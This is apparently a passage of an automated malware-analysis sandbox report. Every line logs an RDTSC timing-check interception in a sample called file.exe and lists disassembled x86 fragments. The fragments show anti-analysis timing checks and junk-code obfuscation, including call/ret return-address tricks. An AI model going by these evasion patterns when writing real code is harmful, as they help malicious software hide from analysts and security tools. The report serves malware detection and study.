                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A6CA9 second address: 5A6CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F789C73D5A6h 0x0000000d jns 00007F789C73D5A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9825 second address: 5A9833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9833 second address: 421C32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F789C73D5B4h 0x00000010 pop eax 0x00000011 mov dword ptr [ebp+122D216Fh], edx 0x00000017 push dword ptr [ebp+122D0825h] 0x0000001d sub edi, dword ptr [ebp+122D3B0Dh] 0x00000023 call dword ptr [ebp+122D2509h] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov edi, dword ptr [ebp+122D3B49h] 0x00000031 popad 0x00000032 xor eax, eax 0x00000034 mov dword ptr [ebp+122D1953h], edi 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e jmp 00007F789C73D5B5h 0x00000043 mov dword ptr [ebp+122D3A41h], eax 0x00000049 xor dword ptr [ebp+122D1953h], ecx 0x0000004f sub dword ptr [ebp+122D23D4h], edi 0x00000055 mov esi, 0000003Ch 0x0000005a jmp 00007F789C73D5B2h 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 je 00007F789C73D5B2h 0x00000069 jbe 00007F789C73D5ACh 0x0000006f mov dword ptr [ebp+122D1953h], ebx 0x00000075 lodsw 0x00000077 clc 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c pushad 0x0000007d mov bh, 82h 0x0000007f jbe 00007F789C73D5A6h 0x00000085 popad 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a cld 0x0000008b nop 0x0000008c push ecx 0x0000008d push eax 0x0000008e push edx 0x0000008f jns 00007F789C73D5A6h 0x00000095 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9877 second address: 5A987B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9950 second address: 5A9955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9B31 second address: 5A9B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9B6B second address: 5A9BC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jne 00007F789C73D5ABh 0x00000010 mov edx, 161A1E5Eh 0x00000015 push 00000000h 0x00000017 movsx edi, bx 0x0000001a call 00007F789C73D5A9h 0x0000001f push ebx 0x00000020 push ebx 0x00000021 jmp 00007F789C73D5B9h 0x00000026 pop ebx 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9BC5 second address: 5A9C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c jmp 00007F789CC6148Fh 0x00000011 pop edi 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 jmp 00007F789CC61491h 0x0000001a ja 00007F789CC6149Dh 0x00000020 jmp 00007F789CC61497h 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d jmp 00007F789CC61497h 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9C34 second address: 5A9CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b movsx edi, cx 0x0000000e push 00000003h 0x00000010 mov dword ptr [ebp+122D21AEh], ecx 0x00000016 push 00000000h 0x00000018 mov edi, eax 0x0000001a push 00000003h 0x0000001c jmp 00007F789C73D5B4h 0x00000021 push 7BCFA40Ch 0x00000026 push ebx 0x00000027 jnc 00007F789C73D5ACh 0x0000002d pop ebx 0x0000002e add dword ptr [esp], 44305BF4h 0x00000035 pushad 0x00000036 add dword ptr [ebp+122D183Bh], edx 0x0000003c call 00007F789C73D5B1h 0x00000041 and bh, 00000005h 0x00000044 pop eax 0x00000045 popad 0x00000046 lea ebx, dword ptr [ebp+1245B712h] 0x0000004c push 00000000h 0x0000004e push esi 0x0000004f call 00007F789C73D5A8h 0x00000054 pop esi 0x00000055 mov dword ptr [esp+04h], esi 0x00000059 add dword ptr [esp+04h], 0000001Ch 0x00000061 inc esi 0x00000062 push esi 0x00000063 ret 0x00000064 pop esi 0x00000065 ret 0x00000066 xchg eax, ebx 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b pop eax 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBB14 second address: 5BBB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9513 second address: 5C9518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5909D0 second address: 5909DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F789CC61492h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5909DD second address: 5909E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C80AB second address: 5C80BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F789CC61486h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C80BA second address: 5C80C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C80C0 second address: 5C80D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F789CC6148Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C80D4 second address: 5C80E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 je 00007F789C73D5AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8217 second address: 5C821D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8385 second address: 5C839A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F789C73D5A6h 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C839A second address: 5C83AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F789CC61486h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jg 00007F789CC61486h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C84C5 second address: 5C84C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C84C9 second address: 5C84CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD463 second address: 5BD469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8BEA second address: 5C8C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789CC61493h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8C01 second address: 5C8C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8C05 second address: 5C8C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F789CC61488h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jne 00007F789CC61486h 0x00000018 jno 00007F789CC61486h 0x0000001e jmp 00007F789CC6148Dh 0x00000023 popad 0x00000024 pushad 0x00000025 jmp 00007F789CC61493h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 pop eax 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8DC9 second address: 5C8DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F789C73D5ACh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8F2F second address: 5C8F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61491h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8F44 second address: 5C8F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C935E second address: 5C9364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9364 second address: 5C9369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9369 second address: 5C9370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9370 second address: 5C937D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CBF97 second address: 5CBF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC510 second address: 5CC514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC5EB second address: 5CC605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F789CC61492h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC605 second address: 5CC64C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnc 00007F789C73D5B0h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F789C73D5B1h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC64C second address: 5CC650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC7D4 second address: 5CC7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789C73D5B0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC7E8 second address: 5CC7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE23 second address: 5CEE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F789C73D5AEh 0x0000000a jg 00007F789C73D5A6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E273 second address: 59E277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E277 second address: 59E295 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F789C73D5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F789C73D5A6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F789C73D5A6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E295 second address: 59E2B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F789CC61496h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E2B5 second address: 59E2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599088 second address: 59908E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D77C3 second address: 5D77C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D77C7 second address: 5D77D1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F789CC61486h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D77D1 second address: 5D77E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F789C73D5A8h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D795B second address: 5D7972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jnc 00007F789CC61486h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7972 second address: 5D7976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7D77 second address: 5D7D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7D7B second address: 5D7D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7ED4 second address: 5D7ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7ED9 second address: 5D7F0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F789C73D5BAh 0x00000008 jmp 00007F789C73D5B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F789C73D5B7h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8702 second address: 5D8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D87F2 second address: 5D8802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007F789C73D5A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8DC7 second address: 5D8DD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F789CC6148Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8DD9 second address: 5D8DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8FCE second address: 5D8FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9445 second address: 5D9480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F789C73D5A8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D191Bh], esi 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jp 00007F789C73D5A6h 0x00000032 jns 00007F789C73D5A6h 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9480 second address: 5D948E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789CC6148Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D948E second address: 5D9492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9731 second address: 5D9735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D98FD second address: 5D9925 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F789C73D5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, ebx 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F789C73D5B2h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9925 second address: 5D9943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jg 00007F789CC61486h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9943 second address: 5D9955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789C73D5AEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9D40 second address: 5D9D58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA768 second address: 5DA7DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F789C73D5A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push edi 0x00000012 mov dword ptr [ebp+122D1B66h], ecx 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b movzx esi, di 0x0000001e mov esi, dword ptr [ebp+122D2270h] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F789C73D5A8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 xchg eax, ebx 0x00000041 jng 00007F789C73D5B4h 0x00000047 pushad 0x00000048 jnl 00007F789C73D5A6h 0x0000004e jl 00007F789C73D5A6h 0x00000054 popad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jmp 00007F789C73D5B0h 0x0000005e push eax 0x0000005f pop eax 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCBA3 second address: 5DCBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCBA7 second address: 5DCBAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DED6D second address: 5DED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD4BE second address: 5DD4DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F789C73D5ACh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF596 second address: 5DF59C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD4DE second address: 5DD4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2A87 second address: 5E2A8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF59C second address: 5DF5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789C73D5B1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF5B1 second address: 5DF5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2F9F second address: 5E2FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2FA3 second address: 5E2FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F789CC6148Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5152 second address: 5E5162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F789C73D5A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E60CD second address: 5E60D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6F4E second address: 5E6F9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F789C73D5ACh 0x0000000c popad 0x0000000d nop 0x0000000e or dword ptr [ebp+124899D4h], ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F789C73D5A8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov edi, 3C5A43DAh 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d jbe 00007F789C73D5A6h 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6F9C second address: 5E6FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
